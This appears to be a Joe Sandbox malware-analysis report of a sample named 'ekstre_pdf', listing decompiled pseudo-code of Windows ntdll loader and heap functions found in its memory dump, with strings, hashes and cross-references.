Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 340DFA58
minkernel\ntdll\ldrdload.c, xrefs: 340DFA68
Unknown, xrefs: 340DFA42, 340DFA54
$, xrefs: 340DFABD

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: b4b47a394a4f966870953e45ed28fb29c826ef5667f35c6466ae0ee059288b60
Instruction ID: 61db3eaa05c546da4fafdf66b7ef15815ad3fb764b377deb77aa955bfc166426
Opcode Fuzzy Hash: b4b47a394a4f966870953e45ed28fb29c826ef5667f35c6466ae0ee059288b60
Instruction Fuzzy Hash: 0C4149B9B00309ABDB01DF99C9A4ADEBBF9FF49354F1080A9E904A7340D7759A15CF90

Uniqueness

Uniqueness Score: -1.00%

Function 34069046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E34069046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x3413be98);
				E340B7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E340A8F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E34079870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x341565e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E3407A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E34085A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E340804C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x341565e0; // 0x759ea680
							 *0x341591e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x341565e8; // 0x767e7740
									if(_t148 != 0) {
										 *0x341591e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E3407DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E34073B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E34079870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E340C247B();
									goto L26;
								} else {
									_t152 = E3407A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E340804C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x34069046
0x34069046
0x3406904b
0x34069050
0x34069055
0x3406905b
0x3406905d
0x34069066
0x3406906f
0x34069078
0x34069080
0x34069088
0x3406908f
0x34069095
0x340690a9
0x340690b1
0x340690be
0x340690c6
0x340690cf
0x340690e2
0x340690f7
0x340690fb
0x34069118
0x00000000
0x34069123
0x3406913b
0x3406913f
0x00000000
0x00000000
0x34069147
0x340c231f
0x340c231f
0x00000000
0x340c231f
0x34069154
0x340c2330
0x340c2336
0x340c2336
0x3406915a
0x3406915a
0x3406915a
0x34069161
0x34069167
0x3406916b
0x34069172
0x34069182
0x3406918e
0x34069199
0x340691ba
0x340691be
0x00000000
0x340691e0
0x340c2358
0x340c2360
0x340c2368
0x340c236a
0x340c2372
0x00000000
0x340c2378
0x340c2378
0x340c2381
0x340c2458
0x340c2458
0x340c245b
0x340c2463
0x340c2468
0x340c246e
0x340c246e
0x340c24a7
0x00000000
0x340c24a7
0x340c238f
0x340c2396
0x340c239c
0x340c239f
0x340c239f
0x340c23bb
0x340c23c8
0x340c23ca
0x340c23d2
0x340c244c
0x340c244c
0x340c2453
0x00000000
0x340c23d4
0x340c23e7
0x340c23e9
0x340c23f1
0x00000000
0x00000000
0x340c23f9
0x340c2402
0x340c2408
0x340c240c
0x340c2413
0x340c2423
0x340c243f
0x00000000
0x00000000
0x340c2441
0x340c2446
0x340c2446
0x00000000
0x340c2446
0x340c23fb
0x00000000
0x340c23fb
0x340c23d2
0x00000000
0x340c2372
0x340691be
0x34069118
0x340690fd
0x34069102
0x3406910e

APIs

RtlDebugPrintTimes.NTDLL ref: 340C2360

Strings

@, xrefs: 34069095
$, xrefs: 340690B1
@w~v, xrefs: 340C245B

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@$@w~v
API String ID: 3446177414-3666185083
Opcode ID: 76221cf3e85a60a5cdd121a888c524c283bad2a884eb93e4de9f9d996f7f9324
Instruction ID: b6a524cfbe22806399b4b034c6eedf3991473743c176d10183af3b9fda07ff00
Opcode Fuzzy Hash: 76221cf3e85a60a5cdd121a888c524c283bad2a884eb93e4de9f9d996f7f9324
Instruction Fuzzy Hash: AF8139B1E00269DFEB21CB54CD40BDEB7B8AF48754F0041EAE90AB7650D7309E858FA5

Uniqueness

Uniqueness Score: -1.00%

Function 3410F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E3410F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t73;
				signed int _t75;
				signed int _t79;
				intOrPtr _t81;
				signed int _t82;
				signed char _t86;
				signed int _t87;
				intOrPtr _t89;
				intOrPtr _t93;
				intOrPtr _t103;
				signed int _t120;
				signed char _t131;
				intOrPtr _t133;
				signed int _t136;
				signed int _t151;
				signed int* _t154;
				signed int _t158;
				signed int* _t160;
				intOrPtr* _t164;
				void* _t165;

				_push(0x34);
				_push(0x3413d2f8);
				E340B7BE4(__ebx, __edi, __esi);
				 *(_t165 - 0x34) = __edx;
				_t162 = __ecx;
				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
				_t158 = 0;
				 *(_t165 - 0x28) = 0;
				 *((char*)(_t165 - 0x19)) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t165 - 4)) = 0;
					 *((intOrPtr*)(_t165 - 4)) = 1;
					_t73 = E34057662("RtlFreeHeap");
					__eflags = _t73;
					if(_t73 == 0) {
						_t158 = 0;
						 *(_t165 - 0x28) = 0;
						L34:
						 *((intOrPtr*)(_t165 - 4)) = 0;
						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
						E3410FBB7();
						_t75 = _t158;
						goto L35;
					}
					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
					 *(_t165 - 0x2c) = _t131;
					 *(_t165 - 0x34) = _t131 | 0x10000000;
					__eflags = _t131 & 0x00000001;
					if((_t131 & 0x00000001) == 0) {
						E3406FED0( *((intOrPtr*)(__ecx + 0xc8)));
						 *((char*)(_t165 - 0x19)) = 1;
						_t120 =  *(_t165 - 0x2c) | 0x10000001;
						__eflags = _t120;
						 *(_t165 - 0x34) = _t120;
					}
					E34110835(_t162, 0);
					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
					__eflags =  *((char*)(_t151 + 7)) - 5;
					if( *((char*)(_t151 + 7)) == 5) {
						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
						__eflags = _t151;
					}
					 *(_t165 - 0x24) = _t151;
					 *(_t165 - 0x2c) = _t151;
					_t133 = _t162;
					_t79 = E3405753F(_t133, _t151, "RtlFreeHeap");
					__eflags = _t79;
					if(_t79 == 0) {
						goto L34;
					} else {
						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x341547d0; // 0x0
						_t81 =  *[fs:0x30];
						if(__eflags != 0) {
							_t82 =  *(_t81 + 0x68);
							 *(_t165 - 0x3c) = _t82;
							__eflags = _t82 & 0x00000800;
							if((_t82 & 0x00000800) == 0) {
								L32:
								_t158 = E34073BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
								 *(_t165 - 0x28) = _t158;
								E34110D24( *((intOrPtr*)(_t165 - 0x30)));
								E34110835( *((intOrPtr*)(_t165 - 0x30)), 0);
								goto L34;
							}
							__eflags =  *0x341547d4;
							if( *0x341547d4 == 0) {
								goto L32;
							}
							_t160 =  *(_t165 - 0x2c);
							_t154 =  *(_t165 - 0x24);
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								_t38 =  &(_t154[0]); // 0xffff
								_t39 =  &(_t154[0]); // 0xffffff
								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
								if(__eflags != 0) {
									_push(_t133);
									E3411D646(0, _t162, _t160, _t160, _t162, __eflags);
									_t154 =  *(_t165 - 0x24);
								}
							}
							__eflags = _t160[0] & 0x00000002;
							if((_t160[0] & 0x00000002) == 0) {
								_t86 = _t160[0];
								 *(_t165 - 0x1a) = _t86;
								_t87 = _t86 & 0x000000ff;
							} else {
								_t103 = E34093AE9(_t160);
								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
								_t87 =  *(_t103 + 2) & 0x0000ffff;
							}
							_t136 = _t87;
							 *(_t165 - 0x20) = _t87;
							__eflags =  *(_t162 + 0x4c);
							if( *(_t162 + 0x4c) != 0) {
								_t51 =  &(_t154[0]); // 0xffff
								_t52 =  &(_t154[0]); // 0xffffff
								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
								__eflags =  *_t160;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								__eflags = _t136 -  *0x341547d4; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x341547d6; // 0x0
								if(__eflags != 0) {
									goto L32;
								}
								_t89 =  *[fs:0x30];
								__eflags =  *(_t89 + 0xc);
								if( *(_t89 + 0xc) == 0) {
									_push("HEAP: ");
									E3405B910();
								} else {
									E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E3410823A(_t162,  *(_t165 - 0x20)));
								E3405B910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
								L30:
								_t93 =  *[fs:0x30];
								__eflags =  *((char*)(_t93 + 2));
								if( *((char*)(_t93 + 2)) != 0) {
									 *0x341547a1 = 1;
									 *0x34154100 = 0;
									asm("int3");
									 *0x341547a1 = 0;
								}
							}
							goto L32;
						}
						__eflags =  *(_t81 + 0xc);
						if( *(_t81 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						E3405B910("About to free block at %p\n",  *0x341547d0);
						goto L30;
					}
				} else {
					_t164 =  *0x34153750; // 0x0
					 *0x341591e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
					_t75 =  *_t164() & 0x000000ff;
					L35:
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
					return _t75;
				}
			}

0x3410f8f8
0x3410f8fa
0x3410f8ff
0x3410f906
0x3410f909
0x3410f90b
0x3410f910
0x3410f912
0x3410f915
0x3410f91f
0x3410f93e
0x3410f941
0x3410f94f
0x3410f954
0x3410f956
0x3410fb8c
0x3410fb8e
0x3410fb91
0x3410fb91
0x3410fb94
0x3410fb9b
0x3410fba0
0x00000000
0x3410fba0
0x3410f95f
0x3410f962
0x3410f96c
0x3410f96f
0x3410f972
0x3410f97a
0x3410f97f
0x3410f986
0x3410f986
0x3410f98b
0x3410f98b
0x3410f992
0x3410f99a
0x3410f99d
0x3410f9a1
0x3410f9aa
0x3410f9aa
0x3410f9aa
0x3410f9ac
0x3410f9af
0x3410f9b7
0x3410f9b9
0x3410f9be
0x3410f9c0
0x00000000
0x3410f9c6
0x3410f9c9
0x3410f9cf
0x3410f9d5
0x3410fa1b
0x3410fa1e
0x3410fa21
0x3410fa26
0x3410fb2b
0x3410fb37
0x3410fb39
0x3410fb41
0x3410fb4b
0x00000000
0x3410fb4b
0x3410fa2c
0x3410fa33
0x00000000
0x00000000
0x3410fa39
0x3410fa3c
0x3410fa3f
0x3410fa42
0x3410fa47
0x3410fa49
0x3410fa4c
0x3410fa51
0x3410fa54
0x3410fa56
0x3410fa5b
0x3410fa60
0x3410fa60
0x3410fa54
0x3410fa63
0x3410fa67
0x3410fa79
0x3410fa7c
0x3410fa7f
0x3410fa69
0x3410fa6b
0x3410fa70
0x3410fa73
0x3410fa73
0x3410fa82
0x3410fa84
0x3410fa88
0x3410fa8b
0x3410fa8d
0x3410fa90
0x3410fa95
0x3410fa9b
0x3410fa9b
0x3410fa9b
0x3410fa9d
0x3410faa0
0x3410faa6
0x3410faad
0x00000000
0x00000000
0x3410fab3
0x3410faba
0x00000000
0x00000000
0x3410fabc
0x3410fac2
0x3410fac5
0x3410fae4
0x3410fae9
0x3410fac7
0x3410fadc
0x3410fae1
0x3410fafa
0x3410fb03
0x3410fb0b
0x3410fb0b
0x3410fb11
0x3410fb15
0x3410fb17
0x3410fb1e
0x3410fb24
0x3410fb25
0x3410fb25
0x3410fb15
0x00000000
0x3410faa0
0x3410f9d7
0x3410f9da
0x3410f9f9
0x3410f9fe
0x3410f9dc
0x3410f9f1
0x3410f9f6
0x3410fa0f
0x00000000
0x3410fa15
0x3410f921
0x3410f926
0x3410f92e
0x3410f936
0x3410fba2
0x3410fba5
0x3410fbb1
0x3410fbb1

APIs

RtlDebugPrintTimes.NTDLL ref: 3410F92E

Strings

HEAP[%wZ]: , xrefs: 3410F9EC, 3410FAD7
About to free block at %p, xrefs: 3410FA0A
About to free block at %p with tag %ws, xrefs: 3410FAFE
HEAP: , xrefs: 3410F9F9, 3410FAE4
RtlFreeHeap, xrefs: 3410F948, 3410F9B2

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 1a64c8af18306276ba5d8dd6966f2f48b22c180ff5146b9dcf123522eb2eb24b
Instruction ID: 15044f0896efcf42a72f981399572e1a4787cde716e487e72de84d3ffa8b0deb
Opcode Fuzzy Hash: 1a64c8af18306276ba5d8dd6966f2f48b22c180ff5146b9dcf123522eb2eb24b
Instruction Fuzzy Hash: 3B71DA35A04A45DFDB01CFA9C491AA9FBF2FF89304F04C0DAE485AB261CB719941CF58

Uniqueness

Uniqueness Score: -1.00%

Function 34056565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184
timeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E34056565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x3415b370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E3407E8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x34159200; // 0x0
				_t113 = 0x20;
				 *0x341565f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E3408E7E0(_t92, _v92);
					}
					_t114 =  *0x34159210; // 0x0
					asm("ror esi, cl");
					 *0x341591e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x34159218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E3406FED0(0x341532d8);
					_t98 = 0x34155d8c;
					if( *0x341565f0 != 0) {
						_t56 =  *0x34155d8c; // 0x3c52ce0
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x34155d8c; // 0x3c52ce0
						if( *0x341565f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x341565f0 = 1;
							 *0x341565f8 = 0;
							E3406E740(_t98);
							E3405676F(_t98);
							return E340A4B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x341532d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x3c52ca8
								_t98 =  *_t24;
								E34056704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x34155d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E340A5050(_t92,  &_v108, _t110);
					_t92 = E34056B45( &_v108,  &_v92, "true",  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x341537c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E340DE692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x341537c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E34097DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x341591e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E3407D3E1(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E340816EE(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x341537c0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E340DE692("minkernel\\ntdll\\ldrinit.c", 0x909, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x341537c0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E340E1D5E(_t113);
						_push(_t113);
						_push(0xffffffff);
						E340A2C70();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}

0x34056574
0x3405657d
0x34056581
0x3405658b
0x34056590
0x34056598
0x340565a3
0x340565a6
0x340565ad
0x340565b1
0x340565b3
0x340565b8
0x34056637
0x34056637
0x3405663a
0x3405663e
0x340566fa
0x340566fa
0x3405664c
0x34056659
0x3405665f
0x34056665
0x34056667
0x3405666f
0x34056678
0x3405667d
0x34056684
0x34056686
0x34056692
0x34056697
0x340b98c3
0x340b98d3
0x340b98d3
0x340b98d5
0x00000000
0x00000000
0x340b98ca
0x340b98cd
0x340b98cd
0x340b98cd
0x340b98d1
0x340b98d1
0x00000000
0x3405669d
0x3405669d
0x340566a4
0x340566aa
0x340566ac
0x340566ac
0x340566b0
0x340566c9
0x340566cb
0x340566d7
0x340566dc
0x340566e1
0x340566f6
0x340566b2
0x340566b2
0x340566b2
0x340566b5
0x340566b7
0x340566b7
0x340566ba
0x340566bf
0x340566c1
0x00000000
0x340566b2
0x340566b0
0x00000000
0x00000000
0x00000000
0x340565ba
0x340565ba
0x340565bf
0x340565d5
0x340565d9
0x340b9835
0x340b983a
0x340b983c
0x340b983e
0x340b9859
0x340b985e
0x340b9863
0x340b9863
0x340b9866
0x340b9868
0x340b986a
0x340b986a
0x340b986d
0x00000000
0x340b986d
0x340565e2
0x340565ec
0x340565f1
0x340565f4
0x340565f7
0x340565fb
0x3405660f
0x34056614
0x3405661a
0x3405661c
0x3405661f
0x00000000
0x3405661f
0x34056602
0x34056606
0x340b9875
0x340b987a
0x340b987c
0x340b987e
0x340b9880
0x340b989a
0x340b989f
0x340b98a4
0x340b98a7
0x340b98a9
0x340b98ab
0x340b98ab
0x340b98ac
0x340b98ae
0x340b98b3
0x340b98b4
0x340b98b6
0x340b98bd
0x00000000
0x340b98bd
0x3405660c
0x00000000
0x34056624
0x3405662a
0x3405662f
0x34056636
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 34056614
RtlDebugPrintTimes.NTDLL ref: 3405665F

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 340B9843
LdrpLoadShimEngine, xrefs: 340B984A, 340B988B
minkernel\ntdll\ldrinit.c, xrefs: 340B9854, 340B9895
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 340B9885

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: a3de92ab108b824161196aaa98d2ce616c23ff284dfd10a503ad5324b22cac73
Instruction ID: b43a965156604fe093c4b9a6b781911159efcd6c6b07a6037c44576a13ae03b6
Opcode Fuzzy Hash: a3de92ab108b824161196aaa98d2ce616c23ff284dfd10a503ad5324b22cac73
Instruction Fuzzy Hash: DC510276B10748DFEB00DBB8C854ADD7BAAEB40348F0405E9E895BB2A5CB709C51CF85

Uniqueness

Uniqueness Score: -1.00%

Function 3408DA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133
timeCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E3408DA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E34129335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E3411F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x3415376c; // 0x0
					 *0x341591e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3405B910();
					} else {
						E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3405B910("Invalid heap signature for heap at %p", _t93);
					E3405B910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E3405B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x341547a1 = 1;
						asm("int3");
						 *0x341547a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
